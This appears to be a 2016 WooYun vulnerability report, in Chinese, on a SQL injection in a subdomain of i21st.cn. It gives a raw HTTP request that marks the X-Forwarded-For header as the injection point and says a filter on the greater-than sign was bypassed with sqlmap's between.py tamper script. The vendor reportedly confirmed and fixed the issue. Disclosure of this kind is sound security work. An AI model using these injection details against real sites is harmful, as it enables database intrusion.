21英语网某蜂蜜站存在SQL注入漏洞可绕过

编号225626
Urlhttp://www.wooyun.org/bug.php?action=view&id=225626
漏洞状态厂商已经修复
漏洞标题21英语网某蜂蜜站存在SQL注入漏洞可绕过
漏洞类型SQL注射漏洞
厂商i21st.cn
白帽子路人甲
提交日期2016-07-04 08:28:00
公开日期2016-07-04 09:19:00
修复时间2016-07-04 09:19:00
确认时间2016-07-04 00:00:00
Confirm Spend0
漏洞标签
关注数0
收藏数0
白帽评级
白帽自评rank15
厂商评级
厂商评rank15
漏洞简介
RT
漏洞细节

GET /2015/jiangsu/njxzc/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
X-Forwarded-For: i*
X-Requested-With: XMLHttpRequest
Referer: http://a1.i21st.cn
Cookie: PHPSESSID=5on6deagburcgvvobapvudsjj2
Host: a1.i21st.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*

过滤了大于号,使用between.py绕过

3.png

POC

修复方案

状态信息 2016-07-04: 细节已通知厂商并且等待厂商处理中
2016-07-04: 厂商已经确认,细节仅向厂商公开
2016-07-04: 厂商已经修复漏洞并主动公开,细节向公众公开
厂商回复这漏洞真是防不胜防啊!感谢路人甲同学
回应信息危害等级:高漏洞Rank:15 确认时间:2016-07-04 09:17